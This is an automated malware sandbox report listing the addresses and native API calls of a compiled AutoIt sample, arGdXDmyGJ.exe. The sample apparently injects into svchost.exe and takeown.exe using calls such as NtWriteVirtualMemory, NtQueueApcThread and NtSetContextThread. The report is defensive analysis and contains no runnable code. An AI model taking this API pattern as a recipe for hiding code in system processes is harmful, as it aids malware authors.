                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: This is a third-party compiled AutoIt script.0_2_00F93B3A
                Source: arGdXDmyGJ.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: arGdXDmyGJ.exe, 00000000.00000002.1234487161.0000000001044000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_212b9fd1-3
                Source: arGdXDmyGJ.exe, 00000000.00000002.1234487161.0000000001044000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_f68c3d94-2
                Source: arGdXDmyGJ.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8fb55844-a
                Source: arGdXDmyGJ.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_7215090d-f
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C253 NtClose,2_2_0042C253
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172B60 NtClose,LdrInitializeThunk,2_2_03172B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03172DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031735C0 NtCreateMutant,LdrInitializeThunk,2_2_031735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03174340 NtSetContextThread,2_2_03174340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03174650 NtSuspendThread,2_2_03174650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172B80 NtQueryInformationFile,2_2_03172B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172BA0 NtEnumerateValueKey,2_2_03172BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172BF0 NtAllocateVirtualMemory,2_2_03172BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172BE0 NtQueryValueKey,2_2_03172BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172AB0 NtWaitForSingleObject,2_2_03172AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172AD0 NtReadFile,2_2_03172AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172AF0 NtWriteFile,2_2_03172AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172F30 NtCreateSection,2_2_03172F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172F60 NtCreateProcessEx,2_2_03172F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172F90 NtProtectVirtualMemory,2_2_03172F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172FB0 NtResumeThread,2_2_03172FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172FA0 NtQuerySection,2_2_03172FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172FE0 NtCreateFile,2_2_03172FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172E30 NtWriteVirtualMemory,2_2_03172E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172E80 NtReadVirtualMemory,2_2_03172E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172EA0 NtAdjustPrivilegesToken,2_2_03172EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172EE0 NtQueueApcThread,2_2_03172EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172D10 NtMapViewOfSection,2_2_03172D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172D00 NtSetInformationFile,2_2_03172D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172D30 NtUnmapViewOfSection,2_2_03172D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172DB0 NtEnumerateKey,2_2_03172DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172DD0 NtDelayExecution,2_2_03172DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172C00 NtQueryInformationProcess,2_2_03172C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172C70 NtFreeVirtualMemory,2_2_03172C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172C60 NtCreateKey,2_2_03172C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172CA0 NtQueryInformationToken,2_2_03172CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172CC0 NtQueryVirtualMemory,2_2_03172CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172CF0 NtOpenProcess,2_2_03172CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03173010 NtOpenDirectoryObject,2_2_03173010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03173090 NtSetValueKey,2_2_03173090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031739B0 NtGetContextThread,2_2_031739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03173D10 NtOpenProcessToken,2_2_03173D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03173D70 NtOpenThread,2_2_03173D70
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F4340 NtSetContextThread,LdrInitializeThunk,10_2_036F4340
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F4650 NtSuspendThread,LdrInitializeThunk,10_2_036F4650
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2B60 NtClose,LdrInitializeThunk,10_2_036F2B60
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2BE0 NtQueryValueKey,LdrInitializeThunk,10_2_036F2BE0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_036F2BF0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2BA0 NtEnumerateValueKey,LdrInitializeThunk,10_2_036F2BA0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2AF0 NtWriteFile,LdrInitializeThunk,10_2_036F2AF0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2AD0 NtReadFile,LdrInitializeThunk,10_2_036F2AD0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2F30 NtCreateSection,LdrInitializeThunk,10_2_036F2F30
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2FE0 NtCreateFile,LdrInitializeThunk,10_2_036F2FE0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2FB0 NtResumeThread,LdrInitializeThunk,10_2_036F2FB0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2EE0 NtQueueApcThread,LdrInitializeThunk,10_2_036F2EE0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2E80 NtReadVirtualMemory,LdrInitializeThunk,10_2_036F2E80
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2D30 NtUnmapViewOfSection,LdrInitializeThunk,10_2_036F2D30
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2D10 NtMapViewOfSection,LdrInitializeThunk,10_2_036F2D10
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_036F2DF0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2DD0 NtDelayExecution,LdrInitializeThunk,10_2_036F2DD0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2C60 NtCreateKey,LdrInitializeThunk,10_2_036F2C60
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_036F2C70
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2CA0 NtQueryInformationToken,LdrInitializeThunk,10_2_036F2CA0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F35C0 NtCreateMutant,LdrInitializeThunk,10_2_036F35C0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F39B0 NtGetContextThread,LdrInitializeThunk,10_2_036F39B0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2B80 NtQueryInformationFile,10_2_036F2B80
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2AB0 NtWaitForSingleObject,10_2_036F2AB0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2F60 NtCreateProcessEx,10_2_036F2F60
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2FA0 NtQuerySection,10_2_036F2FA0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2F90 NtProtectVirtualMemory,10_2_036F2F90
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2E30 NtWriteVirtualMemory,10_2_036F2E30
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2EA0 NtAdjustPrivilegesToken,10_2_036F2EA0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2D00 NtSetInformationFile,10_2_036F2D00
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2DB0 NtEnumerateKey,10_2_036F2DB0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2C00 NtQueryInformationProcess,10_2_036F2C00
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2CF0 NtOpenProcess,10_2_036F2CF0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2CC0 NtQueryVirtualMemory,10_2_036F2CC0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F3010 NtOpenDirectoryObject,10_2_036F3010
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F3090 NtSetValueKey,10_2_036F3090
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F3D70 NtOpenThread,10_2_036F3D70
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F3D10 NtOpenProcessToken,10_2_036F3D10
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F28F60 NtCreateFile,10_2_02F28F60
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F29260 NtClose,10_2_02F29260
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F293C0 NtAllocateVirtualMemory,10_2_02F293C0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F290D0 NtReadFile,10_2_02F290D0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F291C0 NtDeleteFile,10_2_02F291C0
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FFA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00FFA1EF
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FE8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00FE8310
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FF51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00FF51BD
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00F9E6A00_2_00F9E6A0
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FBD9750_2_00FBD975
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FB21C50_2_00FB21C5
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FC62D20_2_00FC62D2
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_010103DA0_2_010103DA
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FC242E0_2_00FC242E
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FB25FA0_2_00FB25FA
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FA66E10_2_00FA66E1
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FEE6160_2_00FEE616
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FC878F0_2_00FC878F
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FF88890_2_00FF8889
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FC68440_2_00FC6844
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FA88080_2_00FA8808
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_010108570_2_01010857
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FBCB210_2_00FBCB21
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FC6DB60_2_00FC6DB6
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FA6F9E0_2_00FA6F9E
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FA30300_2_00FA3030
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FBF1D90_2_00FBF1D9
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FB31870_2_00FB3187
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00F912870_2_00F91287
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FB14840_2_00FB1484
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FA55200_2_00FA5520
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FB76960_2_00FB7696
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FA57600_2_00FA5760
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FB19780_2_00FB1978
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FC9AB50_2_00FC9AB5
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00F9FCE00_2_00F9FCE0
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_01017DDB0_2_01017DDB
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FBBDA60_2_00FBBDA6
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FB1D900_2_00FB1D90
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FA3FE00_2_00FA3FE0
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00F9DF000_2_00F9DF00
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_011536500_2_01153650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004181332_2_00418133
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040286F2_2_0040286F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028702_2_00402870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F8F32_2_0040F8F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E8B32_2_0042E8B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011D02_2_004011D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041634F2_2_0041634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004163532_2_00416353
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DB032_2_0040DB03
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FB132_2_0040FB13
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004043942_2_00404394
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DC472_2_0040DC47
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DC532_2_0040DC53
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004025502_2_00402550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402D702_2_00402D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417E772_2_00417E77
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FA3522_2_031FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032003E62_2_032003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E3F02_2_0314E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E02742_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C02C02_2_031C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DA1182_2_031DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031301002_2_03130100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C81582_2_031C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032001AA2_2_032001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F81CC2_2_031F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D20002_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031647502_2_03164750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031407702_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313C7C02_2_0313C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315C6E02_2_0315C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031405352_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032005912_2_03200591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E44202_2_031E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F24462_2_031F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EE4F62_2_031EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FAB402_2_031FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F6BD72_2_031F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313EA802_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031569622_2_03156962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0320A9A62_2_0320A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314A8402_2_0314A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031268B82_2_031268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E8F02_2_0316E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03160F302_2_03160F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E2F302_2_031E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03182F282_2_03182F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B4F402_2_031B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BEFA02_2_031BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03132FC82_2_03132FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314CFE02_2_0314CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FEE262_2_031FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140E592_2_03140E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03152E902_2_03152E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FCE932_2_031FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FEEDB2_2_031FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DCD1F2_2_031DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314AD002_2_0314AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03158DBF2_2_03158DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313ADE02_2_0313ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140C002_2_03140C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0CB52_2_031E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03130CF22_2_03130CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F132D2_2_031F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312D34C2_2_0312D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0318739A2_2_0318739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031452A02_2_031452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315B2C02_2_0315B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED2_2_031E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0320B16B2_2_0320B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F1722_2_0312F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0317516C2_2_0317516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314B1B02_2_0314B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EF0CC2_2_031EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F70E92_2_031F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FF0E02_2_031FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FF7B02_2_031FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F16CC2_2_031F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F75712_2_031F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DD5B02_2_031DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FF43F2_2_031FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031314602_2_03131460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FFB762_2_031FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315FB802_2_0315FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B5BF02_2_031B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0317DBF92_2_0317DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FFA492_2_031FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F7A462_2_031F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B3A6C2_2_031B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03185AA02_2_03185AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E1AA32_2_031E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EDAC62_2_031EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D59102_2_031D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031499502_2_03149950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315B9502_2_0315B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AD8002_2_031AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031438E02_2_031438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FFF092_2_031FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03141F922_2_03141F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FFFB12_2_031FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03149EB02_2_03149EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F1D5A2_2_031F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03143D402_2_03143D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F7D732_2_031F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315FDC02_2_0315FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B9C322_2_031B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FFCF22_2_031FFCF2
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0377A35210_2_0377A352
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036CE3F010_2_036CE3F0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_037803E610_2_037803E6
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0376027410_2_03760274
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_037402C010_2_037402C0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0374815810_2_03748158
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036B010010_2_036B0100
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0375A11810_2_0375A118
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_037781CC10_2_037781CC
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_037801AA10_2_037801AA
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_037741A210_2_037741A2
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0375200010_2_03752000
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036C077010_2_036C0770
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036E475010_2_036E4750
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036BC7C010_2_036BC7C0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036DC6E010_2_036DC6E0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036C053510_2_036C0535
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0378059110_2_03780591
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0377244610_2_03772446
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0376442010_2_03764420
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0376E4F610_2_0376E4F6
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0377AB4010_2_0377AB40
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03776BD710_2_03776BD7
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036BEA8010_2_036BEA80
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036D696210_2_036D6962
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0378A9A610_2_0378A9A6
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036CA84010_2_036CA840
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036EE8F010_2_036EE8F0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036A68B810_2_036A68B8
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03734F4010_2_03734F40
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03762F3010_2_03762F30
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03702F2810_2_03702F28
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036E0F3010_2_036E0F30
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036CCFE010_2_036CCFE0
